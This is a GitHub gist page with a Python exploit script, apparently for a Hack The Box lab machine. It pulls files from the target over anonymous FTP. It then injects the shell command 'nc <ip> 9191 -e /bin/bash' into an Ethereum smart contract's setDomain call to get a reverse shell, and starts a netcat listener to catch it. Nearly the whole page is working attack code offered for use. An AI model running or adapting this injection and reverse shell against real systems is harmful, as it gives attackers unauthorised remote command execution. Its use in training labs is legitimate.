This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
# -*- coding: utf-8 -*- | |
import json, subprocess | |
import netifaces as ni | |
from web3 import Web3 | |
from sys import exit | |
import os, ftplib | |
# TODO: Modify accordingly | |
TARGET_IP = '10.10.10.142' | |
NET_IFACE = 'tun0' | |
def run_exploit(ip): | |
# Store Ethereum contract address | |
caddress = open('address.txt', 'r').read() | |
caddress = caddress.replace('\n', '') | |
# Load Ethereum contract configuration | |
with open('WeaponizedPing.json') as f: | |
contractData = json.load(f) | |
# Establish a connection with the Ethereum RPC interface | |
w3 = Web3(Web3.HTTPProvider('http://{}:9810'.format(TARGET_IP))) | |
w3.eth.defaultAccount = w3.eth.accounts[0] | |
# Get Application Binary Interface (ABI) and Ethereum bytecode | |
Url = w3.eth.contract(abi=contractData['abi'], bytecode=contractData['bytecode']) | |
contractInstance = w3.eth.contract(address=caddress, abi=contractData['abi']) | |
# Calling the function of contract to set a new domain | |
url = contractInstance.functions.setDomain('hackthebox.eu | nc {} 9191 -e /bin/bash'.format(ip)).transact() | |
# Start netcat handler for reverse shell | |
try: | |
subprocess.call(['nc -lvnp 9191'], shell=True, stderr=subprocess.STDOUT) | |
except: | |
print('[*] Quitting netcat...') | |
def getFiles(): | |
ftp = ftplib.FTP(TARGET_IP) | |
ftp.login('anonymous', 'chainsaw') | |
filenames = ftp.nlst() | |
for filename in filenames: | |
if os.path.exists(filename): | |
os.remove(filename) | |
file = open(filename, 'wb') | |
ftp.retrbinary('RETR '+ filename, file.write) | |
file.close() | |
ftp.quit() | |
if __name__ == '__main__': | |
try: | |
ni.ifaddresses(NET_IFACE) | |
ip = ni.ifaddresses(NET_IFACE)[ni.AF_INET][0]['addr'] | |
except: | |
print('[*] Failed to fetch local IP address. Exiting...') | |
exit() | |
getFiles() | |
run_exploit(ip) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment